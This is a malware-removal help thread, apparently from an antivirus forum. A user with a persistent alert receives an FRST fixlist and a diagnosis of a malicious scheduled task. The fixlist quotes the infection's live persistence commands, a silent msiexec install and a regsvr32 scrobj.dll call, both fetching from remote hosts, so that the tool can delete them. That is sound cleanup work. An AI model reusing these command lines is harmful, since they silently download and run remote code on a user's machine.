Hi! It will make a week that I had the first alert of this problem that I’m sending in image along with the txt files, and I couldn’t take it out from the computer in anyway!
I really need a help on this!!
And sorry if my english is bad ![]()
Thank you!
Hi! It will make a week that I had the first alert of this problem that I’m sending in image along with the txt files, and I couldn’t take it out from the computer in anyway!
I really need a help on this!!
And sorry if my english is bad ![]()
Thank you!
What is KMS doing on your system ?
You can try the following but the cracked software will most likely let malware back on the system:
Open notepad by pressing the Windows Key + R Key, typing in Notepad in the Run dialog and then pressing Enter. Please copy the contents of the Code box below. To do this highlight the contents of the box by clicking [Select] next to Code: , then right click on any of the highlighted text and select copy. Paste this into the open notepad. Save it to your desktop as fixlist.txt
Start
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-1903242279-761145565-2508458280-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YRWU3F8I5NjlQFjLYRjH2OWqcNkJSFUU8NYZWOTVXRq== /q
HKU\S-1-5-21-1903242279-761145565-2508458280-1000\...\Policies\Explorer: [NoInternetOpenWith] 1
HKU\S-1-5-21-1903242279-761145565-2508458280-1000\...\MountPoints2: {dab8181c-dbdd-11e3-930a-94de80af3446} - "F:\setup.exe"
2017-04-10 06:19 - 2017-04-11 07:50 - 00003668 _____ C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT
2017-04-17 01:46 - 2017-04-17 01:47 - 12269056 _____ (Team RuneMate) C:\Users\Felipe\AppData\Local\Temp\RuneMate_2_19_1_0_windows_i586_setup.exe
Task: {9015E0A6-B438-40C2-ADBE-440845E606B9} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj1YRWU3F8I5NjlQFjLYRjH2OWqcNkJSFUU8NYZWOTVXRq== scrobj.dll
Task: C:\WINDOWS\Tasks\Yahoo! Powered tedic.job => C:\ProgramData\{365EF33D-BC1C-79FB-3ADA-E7B9A0986C77}\feta.txt <==== ATENÇÃO
AlternateDataStreams: C:\Users\Felipe:Heroes & Generals [38]
AlternateDataStreams: C:\ProgramData\TEMP:6BE50C2B [464]
AlternateDataStreams: C:\ProgramData\TEMP:E41EAF13 [117]
AlternateDataStreams: C:\Users\Todos os Usuários\TEMP:6BE50C2B [464]
AlternateDataStreams: C:\Users\Todos os Usuários\TEMP:E41EAF13 [117]
Hosts:
cmd: ipconfig /flushdns
cmd: netsh advfirewall reset
cmd: netsh advfirewall set allprofiles state on
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
CMD: bitsadmin /reset /allusers
RemoveProxy:
EmptyTemp:
Reboot:
end
NOTE. It’s important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
Run FRST64 by right clicking on the FRST64.exe file, selecting “Run as Administrator…”. The User Account Control may open up; if it does, select Yes to continue to let FRST open and load.
The tool will check for an updated version of itself every time it loads; please allow it to do this and the program will either inform you it is downloading an updated copy (and to wait until it is safe to continue) or show nothing (meaning there is no update found) and you can continue on. Press the Fix button just once and wait. The tool will create a restore point, process the script and ask for a restart of your system.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please attach it to your reply post. Also, tell me how your system is running now.
KMS is for a cracked software and I really need this software working, but if that is the real problem I uninstall, but it has been on the PC for quite some time, is it causing the problems now? ![]()
My sistem is working normally, but as the day goes by, it starts to crash, and some Windows features start to work slowly. I am going to keep the computer on for a while and in case it starts to crash I will update here. ![]()
[UPDATE] Hey dbrisendine, I left my PC turned on all day long, and didn’t notice any slow in the system this time after I run the fixlist.txt, but the avast alert still pops up every 3 hours ):
And other thing, you said that the the tool will create a restore point, process the script and asks to restart the system right? But after the restore point the tool doesn’t ask to restart the system, maybe I did something wrong?
You need to remove all illegal/hacked/crack software.
There really is no need for it to use those.
Simply buy the software or use one of the many free alternatives.
e.g. instead of MS office , you can use LibreOffice.
Hey dbrisendine! I ran the fixlist again! This time I think the job is complete ![]()
The final fixlog.txt is here, sorry for my delay to see that the fislistx.txt didn’t run till the end ):
Hello FeFig,
the detection is caused by a malicious scheduled task. We’re analyzing the threat and working working on more efficient mitigation than URL blocking. Can you please post output of following command (run it from Command Prompt)? schtasks /FO TABLE /NH /V | FINDSTR lotusiloveyou.
Also looking at the logs you posted, it seems to be caused by “PowerWord-SCT-JT”. But there is also an error during removal…
Thank you.
Jiri